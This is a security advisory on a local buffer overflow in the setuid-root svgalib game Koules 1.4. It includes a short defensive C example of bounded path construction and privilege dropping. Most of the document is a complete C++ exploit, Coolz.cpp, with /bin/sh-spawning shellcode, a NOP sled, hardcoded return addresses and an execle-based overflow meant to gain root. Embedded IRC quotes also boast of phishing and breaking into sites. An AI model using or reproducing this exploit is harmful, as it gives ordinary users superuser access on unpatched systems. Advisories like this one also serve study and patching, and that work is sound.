Koules Svgalib Local Buffer Overflow

Published: 2000-11-22
Updated: 2000-11-22

Affected systems:
Jan Hubicka Koules 1.4
       - Slackware Linux 7.1
       - RedHat Linux 7.0
       - FreeBSD FreeBSD 4.2
       - Debian Linux 2.3
Description:

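Koules is a game developed by Jan Hubicka; this version uses svgalib. Programs
that use svgalib are generally installed setuid-to-root so that ordinary users
running them on the console can access the video hardware directly. However, a
buffer overflow exists in the handling of user-supplied command-line arguments,
which may allow an ordinary user to gain superuser privileges.

<* Source: Guido Bakker (guidob@mainnet.nl) *>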
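
The defect class described above, an unbounded string concatenation of a command-line argument inside a setuid-root program, is closed by length-checked path construction and by dropping privileges before argv is parsed. The following is an added example, not Koules source and not part of the advisory: the function names, the file name `start.raw`, the 1024-byte buffer size and the assumption that the helper needs no root privilege of its own are all hypothetical.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Assumed buffer size for illustration; not taken from the Koules source. */
#define PATH_BUF 1024

/* Unsafe pattern of the kind the advisory describes (comment only, not compiled):
 *     char path[PATH_BUF];
 *     strcpy(path, argv[1]);   no length check on an attacker-controlled argument
 *     strcat(path, name);      can write past path[] into the saved frame
 */

/* Bounded replacement: returns 0 on success, -1 if "dir/name" does not fit. */
int build_sample_path(char *out, size_t outsz, const char *dir, const char *name)
{
    int n;
    if (out == NULL || outsz == 0 || dir == NULL || name == NULL)
        return -1;
    n = snprintf(out, outsz, "%s/%s", dir, name);
    if (n < 0 || (size_t)n >= outsz) {   /* would have been truncated: reject */
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Permanently give up setuid/setgid privileges before any argv handling.
 * Returns 0 when no elevated privilege remains, -1 otherwise. */
int drop_privileges(void)
{
    if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
        return -1;
    if (getuid() != 0 && setuid(0) == 0)  /* regaining root must fail */
        return -1;
    return 0;
}

int main(int argc, char **argv)
{
    char path[PATH_BUF];
    if (drop_privileges() != 0) return 1;
    if (argc < 2 || build_sample_path(path, sizeof path, argv[1], "start.raw") != 0) {
        fputs("sound directory argument missing or too long\n", stderr);
        return 1;
    }
    puts(path);
    return 0;
}
```
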


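Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!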


http://www.securityfocus.com/data/vulnerabilities/exploits/Coolz.cpp

--------------------------------------------------------------------------
/*
   Coolz.cpp - yep a C Plus Plus exploit, I like that Strings STL :)

   This problem has been known since April this year, but I have not
   seen any exploit so far.

   First of all I wasn't planning to go and release another ordinary stack
   smash, but I found the setuid game on some wargame/hackme I played on.
   Funny thing was that the exploitability proved to be a bit harder than I
   had anticipated at first.

   The problem can be found in the Koules1.4 package, code file:
      koules.sndsrv.linux.c - function: init()

   The `int i` disappears in the optimization gcc does. Since the strcat()
   function concatenates an array of filenames, `argv` gets ruined.
   This will cause the first run of the loop to fail.
   If argv points somewhere into addressable memory space, the chances of
   having a second pointer in there are close to zero, thus the second loop
   will fail.
   Last of all, if the argv[1] does point to a valid address the string
   contained there shouldn't be long enough to overwrite eip a second time,
   since that gets us into trouble. That's about it :)
   Even then, this ONLY works on machines that have compiled SVGALIB support
   in and NOT on the X windows version of 'koules'.

  Requested IRC quotes:
    <dagger02> ik heb jeuk aan me ballen.

    <marshal-> waar ben jij nu mee bezig man
    <sArGeAnt> nog een keer sukkel
    <sArGeAnt> en je ken es lekker kijken hoe packetjes je modem binnen komen

    <gmd-> sex ?

    <orangehaw> Scrippie HOU JE MOND OF Ik PACkEt Je ? ;)

    <silvio> chicks dig me when i place a bet, cause the mandelbrot sucks
             compare to the julia set

    <jimjones> 4 years ago there was no aol account i couldnt phish, now my
               unix virii grow faster than the petry dish

    <dugje>  I've seen nasa.gov navy.mil compaq.com and microsoft.com, there
             is only one goal left .. *.root-servers.net.

   Love goes out to: Hester and Maja
   Shouts go out to: Aad de Bruin, Karel Roos, L.G. Weert, Louis Maatman,
                     Richard Vriesde.
             --  We always did feel the same, we just saw it from a
                  different point of view...
                      [Bob Dylan - Tangled up in Blue]

<Scrippie> vraag me af wat ze zullen doen bij klpd als ze dat lezen (:
<dugje> ghehe ... je een plaatsje hoger zetten op de priority list ..

   -- Scrippie/ronald@grafix.nl
*/

/* Synnergy.net (c) 2000 */

#include <cstdio>
#include <string>
#include <cstdlib>
#include <cstring>
#include <unistd.h>

#define FILENAME "/usr/local/lib/koules/koules.sndsrv.linux"

#define NOP     'A'
#define NUMNOPS 500
#define RETADDY "\x90\xfe\xff\xbf"
/* Since we return in the cleared environment, we don't need to have a
   return address we can influence by command line "offset" arguments */

std::string heavenlycode =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

char *addytostr(unsigned char *);

using namespace std;

int main()
{
   string payload, vector;
   unsigned int i;
   const char *env[3];
   const char *ptr_to_bffffffc;

   /* Construction of our payload */
   payload.append(NUMNOPS, NOP);
   payload.append(heavenlycode);

   env[0] = payload.c_str();
   /* This memory address always contains 0x00000000 */
   env[1] = "\xfc\xff\xff\xbf";
   env[2] = NULL;

   /* Calculate for yourself, and check out: linux/fs/exec.c */
   ptr_to_bffffffc =
        addytostr((unsigned char *)(0xc0000000-sizeof(void *)-sizeof(FILENAME)
                                    -sizeof(heavenlycode)-sizeof(char *)-1));

   for(i=0;i<256;i++) {
      vector.append(RETADDY);           /* Fill the buffer */
   }
   /* We do NOT overwrite 'int i' - a register is used after gcc -O */
   vector.append(RETADDY);              /* Overwrites ebp */
   vector.append(RETADDY);              /* Overwrites eip */
   vector.append(ptr_to_bffffffc);      /* Overwrites argv argument */

   execle(FILENAME, "Segmentation fault (core dumped)", vector.c_str(), "A",
          NULL, env);

   perror("execle()");
}

char *addytostr(unsigned char *blaat)
{
   char *ret;

   if(!(ret = (char *)malloc(sizeof(unsigned char *)+1))) {
      perror("malloc()");
      exit(EXIT_FAILURE);
   }
   memcpy(ret, &blaat, sizeof(unsigned char *));
   ret[sizeof(unsigned char *)] = 0x00;

   return(ret);
}
--------------------------------------------------------------------------



Recommendation:

    None at this time

This vulnerability advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.